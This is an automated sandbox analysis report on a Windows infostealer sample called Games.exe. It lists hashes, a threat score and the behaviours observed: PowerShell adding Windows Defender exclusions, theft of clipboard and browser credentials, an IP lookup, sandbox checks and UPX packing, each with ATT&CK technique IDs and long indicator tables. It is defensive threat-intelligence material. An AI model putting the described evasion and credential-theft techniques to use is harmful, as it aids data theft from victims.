2324685434befd2a0c236ba3672b7419856712568ef81ec10e371803e39e43f1

Analysis

max time kernel
315s
max time network
317s
platform
windows10-2004_x64
resource
win10v2004-20241007-en
resource tags

arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
submitted
13-01-2025 17:35

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

Games.exe
Size

7.6MB
MD5

5a63730ddd02e4989b56190e1de85a07
SHA1

089adde2832dc6103c98220eb8b0bdafe8c74d07
SHA256

2324685434befd2a0c236ba3672b7419856712568ef81ec10e371803e39e43f1
SHA512

f2a4bdd256e837608beaf81ce30ddd237761e667bbfa2a664c1687d24e4fae722801f6ed03ba94f90076f9e7d9c69d780afdb1f58dc585ff59d40222a9a647ff
SSDEEP

196608:/nD+kdvwfI9jUCBB7m+mKOY7rXrZusooDmhfvsbnTNWT:/5qIHL7HmBYXrYoaUNU

Score

8^/10

collection defense_evasion discovery execution spyware stealer upx

Malware Config

Signatures

Command and Scripting Interpreter: PowerShell 1 TTPs 6 IoCs

Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

execution

PowerShell

T1059.001

pid	Process
672	powershell.exe
2428	powershell.exe
3160	powershell.exe
1204	powershell.exe
216	powershell.exe
5472	powershell.exe

Downloads MZ/PE file

Clipboard Data 1 TTPs 4 IoCs

Adversaries may collect data stored in the clipboard from users copying information within or between applications.

collection

Clipboard Data

T1115

pid	Process
5492	powershell.exe
1416	powershell.exe
2340	cmd.exe
5136	cmd.exe

Executes dropped EXE 11 IoCs

pid	Process
4352	rar.exe
4496	Games.exe
1864	Games.exe
5764	Games.exe
3224	Games.exe
2052	rar.exe
5912	Games.exe
4576	Games.exe
1652	Games.exe
60	Games.exe
5568	7za.exe

Loads dropped DLL 64 IoCs

pid	Process
4060	Games.exe
4060	Games.exe
4060	Games.exe
4060	Games.exe
4060	Games.exe
4060	Games.exe
4060	Games.exe
4060	Games.exe
4060	Games.exe
4060	Games.exe
4060	Games.exe
4060	Games.exe
4060	Games.exe
4060	Games.exe
4060	Games.exe
4060	Games.exe
4060	Games.exe
1864	Games.exe
1864	Games.exe
1864	Games.exe
1864	Games.exe
1864	Games.exe
1864	Games.exe
1864	Games.exe
1864	Games.exe
1864	Games.exe
1864	Games.exe
1864	Games.exe
1864	Games.exe
1864	Games.exe
1864	Games.exe
1864	Games.exe
1864	Games.exe
1864	Games.exe
3224	Games.exe
3224	Games.exe
3224	Games.exe
3224	Games.exe
3224	Games.exe
3224	Games.exe
3224	Games.exe
3224	Games.exe
3224	Games.exe
3224	Games.exe
3224	Games.exe
3224	Games.exe
3224	Games.exe
3224	Games.exe
3224	Games.exe
3224	Games.exe
4576	Games.exe
4576	Games.exe
4576	Games.exe
4576	Games.exe
4576	Games.exe
4576	Games.exe
4576	Games.exe
4576	Games.exe
4576	Games.exe
4576	Games.exe
4576	Games.exe
4576	Games.exe
4576	Games.exe
4576	Games.exe

Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

Credentials from Web Browsers
T1555.003

Looks up external IP address via web service 2 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
17	ip-api.com
157	ip-api.com

Obfuscated Files or Information: Command Obfuscation 1 TTPs
Adversaries may obfuscate content during command execution to impede detection.
defense_evasion

Command Obfuscation
T1027.010

Enumerates processes with tasklist 1 TTPs 6 IoCs

discovery

Process Discovery

T1057

pid	Process
2272	tasklist.exe
4084	tasklist.exe
3244	tasklist.exe
1992	tasklist.exe
5640	tasklist.exe
3512	tasklist.exe

UPX packed file 64 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral1/files/0x0007000000023ca5-21.dat	upx
behavioral1/memory/4060-25-0x00007FFA248C0000-0x00007FFA24F25000-memory.dmp	upx
behavioral1/files/0x0007000000023c98-27.dat	upx
behavioral1/files/0x0007000000023ca9-38.dat	upx
behavioral1/memory/4060-48-0x00007FFA39420000-0x00007FFA3942F000-memory.dmp	upx
behavioral1/files/0x0007000000023c9f-47.dat	upx
behavioral1/files/0x0007000000023c9e-46.dat	upx
behavioral1/files/0x0007000000023c9d-45.dat	upx
behavioral1/files/0x0007000000023c9c-44.dat	upx
behavioral1/files/0x0007000000023c9b-43.dat	upx
behavioral1/files/0x0007000000023c9a-42.dat	upx
behavioral1/files/0x0007000000023c99-41.dat	upx
behavioral1/files/0x0007000000023c97-40.dat	upx
behavioral1/files/0x0007000000023caa-39.dat	upx
behavioral1/files/0x0007000000023ca8-37.dat	upx
behavioral1/files/0x0007000000023ca4-34.dat	upx
behavioral1/files/0x0007000000023ca2-33.dat	upx
behavioral1/memory/4060-31-0x00007FFA386D0000-0x00007FFA386F7000-memory.dmp	upx
behavioral1/files/0x0007000000023ca3-30.dat	upx
behavioral1/memory/4060-54-0x00007FFA37FC0000-0x00007FFA37FEB000-memory.dmp	upx
behavioral1/memory/4060-56-0x00007FFA38C90000-0x00007FFA38CA9000-memory.dmp	upx
behavioral1/memory/4060-60-0x00007FFA331A0000-0x00007FFA3331F000-memory.dmp	upx
behavioral1/memory/4060-58-0x00007FFA33CA0000-0x00007FFA33CC5000-memory.dmp	upx
behavioral1/memory/4060-64-0x00007FFA37F10000-0x00007FFA37F1D000-memory.dmp	upx
behavioral1/memory/4060-70-0x00007FFA33A80000-0x00007FFA33AB3000-memory.dmp	upx
behavioral1/memory/4060-71-0x00007FFA241C0000-0x00007FFA246F3000-memory.dmp	upx
behavioral1/memory/4060-73-0x00007FFA2D8B0000-0x00007FFA2D97E000-memory.dmp	upx
behavioral1/memory/4060-69-0x00007FFA248C0000-0x00007FFA24F25000-memory.dmp	upx
behavioral1/memory/4060-75-0x00007FFA33A60000-0x00007FFA33A74000-memory.dmp	upx
behavioral1/memory/4060-80-0x00007FFA24100000-0x00007FFA241B3000-memory.dmp	upx
behavioral1/memory/4060-79-0x00007FFA37FC0000-0x00007FFA37FEB000-memory.dmp	upx
behavioral1/memory/4060-77-0x00007FFA33DE0000-0x00007FFA33DED000-memory.dmp	upx
behavioral1/memory/4060-113-0x00007FFA38C90000-0x00007FFA38CA9000-memory.dmp	upx
behavioral1/memory/4060-62-0x00007FFA34A00000-0x00007FFA34A19000-memory.dmp	upx
behavioral1/memory/4060-191-0x00007FFA33CA0000-0x00007FFA33CC5000-memory.dmp	upx
behavioral1/memory/4060-192-0x00007FFA331A0000-0x00007FFA3331F000-memory.dmp	upx
behavioral1/memory/4060-231-0x00007FFA241C0000-0x00007FFA246F3000-memory.dmp	upx
behavioral1/memory/4060-230-0x00007FFA33A80000-0x00007FFA33AB3000-memory.dmp	upx
behavioral1/memory/4060-234-0x00007FFA2D8B0000-0x00007FFA2D97E000-memory.dmp	upx
behavioral1/memory/4060-235-0x00007FFA248C0000-0x00007FFA24F25000-memory.dmp	upx
behavioral1/memory/4060-305-0x00007FFA248C0000-0x00007FFA24F25000-memory.dmp	upx
behavioral1/memory/4060-340-0x00007FFA248C0000-0x00007FFA24F25000-memory.dmp	upx
behavioral1/memory/4060-360-0x00007FFA33CA0000-0x00007FFA33CC5000-memory.dmp	upx
behavioral1/memory/4060-364-0x00007FFA33A80000-0x00007FFA33AB3000-memory.dmp	upx
behavioral1/memory/4060-363-0x00007FFA37F10000-0x00007FFA37F1D000-memory.dmp	upx
behavioral1/memory/4060-362-0x00007FFA34A00000-0x00007FFA34A19000-memory.dmp	upx
behavioral1/memory/4060-359-0x00007FFA38C90000-0x00007FFA38CA9000-memory.dmp	upx
behavioral1/memory/4060-358-0x00007FFA37FC0000-0x00007FFA37FEB000-memory.dmp	upx
behavioral1/memory/4060-357-0x00007FFA2D8B0000-0x00007FFA2D97E000-memory.dmp	upx
behavioral1/memory/4060-356-0x00007FFA386D0000-0x00007FFA386F7000-memory.dmp	upx
behavioral1/memory/4060-355-0x00007FFA39420000-0x00007FFA3942F000-memory.dmp	upx
behavioral1/memory/4060-354-0x00007FFA24100000-0x00007FFA241B3000-memory.dmp	upx
behavioral1/memory/4060-353-0x00007FFA33DE0000-0x00007FFA33DED000-memory.dmp	upx
behavioral1/memory/4060-352-0x00007FFA33A60000-0x00007FFA33A74000-memory.dmp	upx
behavioral1/memory/4060-351-0x00007FFA241C0000-0x00007FFA246F3000-memory.dmp	upx
behavioral1/memory/4060-361-0x00007FFA331A0000-0x00007FFA3331F000-memory.dmp	upx
behavioral1/memory/1864-808-0x00007FFA1F270000-0x00007FFA1F8D5000-memory.dmp	upx
behavioral1/memory/1864-809-0x00007FFA3BB80000-0x00007FFA3BBA7000-memory.dmp	upx
behavioral1/memory/1864-810-0x00007FFA3D830000-0x00007FFA3D83F000-memory.dmp	upx
behavioral1/memory/1864-815-0x00007FFA3BB50000-0x00007FFA3BB7B000-memory.dmp	upx
behavioral1/memory/1864-816-0x00007FFA3BB30000-0x00007FFA3BB49000-memory.dmp	upx
behavioral1/memory/1864-817-0x00007FFA3BB00000-0x00007FFA3BB25000-memory.dmp	upx
behavioral1/memory/1864-818-0x00007FFA23D10000-0x00007FFA23E8F000-memory.dmp	upx
behavioral1/memory/1864-819-0x00007FFA3BAE0000-0x00007FFA3BAF9000-memory.dmp	upx

Browser Information Discovery 1 TTPs
Enumerate browser information.
discovery

Browser Information Discovery
T1217
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Checks SCSI registry key(s) 3 TTPs 3 IoCs

SCSI information is often read in order to detect sandboxing environments.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000	taskmgr.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A	taskmgr.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\FriendlyName	taskmgr.exe

Checks processor information in registry 2 TTPs 14 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier	firefox.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	taskmgr.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	taskmgr.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Signature	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier	firefox.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	firefox.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	firefox.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	firefox.exe

Detects videocard installed 1 TTPs 2 IoCs

Uses WMIC.exe to determine videocard installed.

System Information Discovery

T1082

pid	Process
4152	WMIC.exe
5784	WMIC.exe

Enumerates system info in registry 2 TTPs 15 IoCs

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	msedge.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	chrome.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	msedge.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	msedge.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	chrome.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	chrome.exe

Gathers system information 1 TTPs 2 IoCs

Runs systeminfo.exe.

System Information Discovery

T1082

pid	Process
644	systeminfo.exe
5532	systeminfo.exe

Kills process with taskkill 11 IoCs

evasion

pid	Process
3076	taskkill.exe
5492	taskkill.exe
2380	taskkill.exe
5784	taskkill.exe
5472	taskkill.exe
6016	taskkill.exe
768	taskkill.exe
5508	taskkill.exe
5856	taskkill.exe
6052	taskkill.exe
2036	taskkill.exe

Modifies data under HKEY_USERS 3 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry	chrome.exe
Set value (int)	\REGISTRY\USER\S-1-5-19\SOFTWARE\Microsoft\Cryptography\TPM\Telemetry\TraceTimeLast = "133812635672891888"	chrome.exe
Key created	\REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry	chrome.exe

Modifies registry class 64 IoCs

description	ioc	Process
Set value (int)	\REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\6\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByKey:PID = "0"	AME Wizard Beta.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\4\ComDlg\{7D49D726-3C21-4F05-99AA-FDC2C9474656}\FFlags = "1092616257"	AME Wizard Beta.exe
Key created	\REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\4\Shell	AME Wizard Beta.exe
Key created	\REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\6\ComDlg	AME Wizard Beta.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{885A186E-A440-4ADA-812B-DB871B942259}\GroupByDirection = "4294967295"	AME Wizard Beta.exe
Key created	\REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000_Classes\Local Settings	firefox.exe
Key created	\REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\6\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}	AME Wizard Beta.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\6\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByKey:FMTID = "{00000000-0000-0000-0000-000000000000}"	AME Wizard Beta.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\6\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByDirection = "1"	AME Wizard Beta.exe
Key created	\REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000_Classes\Local Settings	msedge.exe
Key created	\REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\1	AME Wizard Beta.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\4\Shell\SniffedFolderType = "Documents"	AME Wizard Beta.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\4\ComDlg\{7D49D726-3C21-4F05-99AA-FDC2C9474656}\Sort = 000000000000000000000000000000000100000030f125b7ef471a10a5f102608c9eebac0a00000001000000	AME Wizard Beta.exe
Key created	\REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1	AME Wizard Beta.exe
Key created	\REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\0\0	AME Wizard Beta.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\0\MRUListEx = 0000000001000000ffffffff	AME Wizard Beta.exe
Key created	\REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg	AME Wizard Beta.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{885A186E-A440-4ADA-812B-DB871B942259}\GroupView = "4294967295"	AME Wizard Beta.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\6\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\Mode = "4"	AME Wizard Beta.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\6\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\Sort = 000000000000000000000000000000000100000030f125b7ef471a10a5f102608c9eebac0a00000001000000	AME Wizard Beta.exe
Key created	\REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\0	AME Wizard Beta.exe
Key created	\REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags	AME Wizard Beta.exe
Key created	\REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\4\ComDlg	AME Wizard Beta.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\4\ComDlg\{7D49D726-3C21-4F05-99AA-FDC2C9474656}\IconSize = "16"	AME Wizard Beta.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{885A186E-A440-4ADA-812B-DB871B942259}\LogicalViewMode = "1"	AME Wizard Beta.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{885A186E-A440-4ADA-812B-DB871B942259}\ColInfo = 00000000000000000000000000000000fddfdffd100000000000000000000000040000001800000030f125b7ef471a10a5f102608c9eebac0a0000001001000030f125b7ef471a10a5f102608c9eebac0e0000009000000030f125b7ef471a10a5f102608c9eebac040000007800000030f125b7ef471a10a5f102608c9eebac0c00000050000000	AME Wizard Beta.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{885A186E-A440-4ADA-812B-DB871B942259}\GroupByKey:FMTID = "{B725F130-47EF-101A-A5F1-02608C9EEBAC}"	AME Wizard Beta.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\6\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\LogicalViewMode = "1"	AME Wizard Beta.exe
Key created	\REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000_Classes\Local Settings	AME Wizard Beta.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\4\ComDlg\{7D49D726-3C21-4F05-99AA-FDC2C9474656}\GroupByKey:PID = "0"	AME Wizard Beta.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.apbx\DefaultIcon	AME Wizard Beta.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\4\ComDlg\{7D49D726-3C21-4F05-99AA-FDC2C9474656}\GroupView = "0"	AME Wizard Beta.exe
Key created	\REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{885A186E-A440-4ADA-812B-DB871B942259}	AME Wizard Beta.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{885A186E-A440-4ADA-812B-DB871B942259}\GroupByKey:PID = "14"	AME Wizard Beta.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\6\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\FFlags = "1092616257"	AME Wizard Beta.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\4\ComDlg\{7D49D726-3C21-4F05-99AA-FDC2C9474656}\ColInfo = 00000000000000000000000000000000fddfdffd100000000000000000000000040000001800000030f125b7ef471a10a5f102608c9eebac0a0000001001000030f125b7ef471a10a5f102608c9eebac0e0000009000000030f125b7ef471a10a5f102608c9eebac040000007800000030f125b7ef471a10a5f102608c9eebac0c00000050000000	AME Wizard Beta.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\Shell\SniffedFolderType = "Downloads"	AME Wizard Beta.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{885A186E-A440-4ADA-812B-DB871B942259}\Mode = "4"	AME Wizard Beta.exe
Key created	\REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\6\Shell	AME Wizard Beta.exe
Key created	\REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\6	AME Wizard Beta.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\6\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\ColInfo = 00000000000000000000000000000000fddfdffd100000000000000000000000040000001800000030f125b7ef471a10a5f102608c9eebac0a0000001001000030f125b7ef471a10a5f102608c9eebac0e0000009000000030f125b7ef471a10a5f102608c9eebac040000007800000030f125b7ef471a10a5f102608c9eebac0c00000050000000	AME Wizard Beta.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\6\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\FFlags = "1"	AME Wizard Beta.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.apbx\DefaultIcon\ = "%PROGRAMDATA%\\AME\\Playbooks.ico"	AME Wizard Beta.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\4\ComDlg\{7D49D726-3C21-4F05-99AA-FDC2C9474656}\Mode = "4"	AME Wizard Beta.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\4\ComDlg\{7D49D726-3C21-4F05-99AA-FDC2C9474656}\LogicalViewMode = "1"	AME Wizard Beta.exe
Key created	\REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2	AME Wizard Beta.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\6\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupView = "0"	AME Wizard Beta.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\MRUListEx = 010000000000000002000000ffffffff	AME Wizard Beta.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\4\ComDlg\{7D49D726-3C21-4F05-99AA-FDC2C9474656}\FFlags = "1"	AME Wizard Beta.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{885A186E-A440-4ADA-812B-DB871B942259}\Sort = 000000000000000000000000000000000100000030f125b7ef471a10a5f102608c9eebac0e000000ffffffff	AME Wizard Beta.exe
Key created	\REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\4\ComDlg\{7D49D726-3C21-4F05-99AA-FDC2C9474656}	AME Wizard Beta.exe
Key created	\REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell	AME Wizard Beta.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\MRUListEx = 000000000100000002000000ffffffff	AME Wizard Beta.exe
Key created	\REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\Shell	AME Wizard Beta.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{885A186E-A440-4ADA-812B-DB871B942259}\IconSize = "16"	AME Wizard Beta.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{885A186E-A440-4ADA-812B-DB871B942259}\FFlags = "1"	AME Wizard Beta.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\6\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\IconSize = "16"	AME Wizard Beta.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.apbx	AME Wizard Beta.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\6\Shell\SniffedFolderType = "Generic"	AME Wizard Beta.exe
Key created	\REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000_Classes\CLSID\{018D5C66-4533-4307-9B53-224DE2ED1FE6}\Instance\	AME Wizard Beta.exe
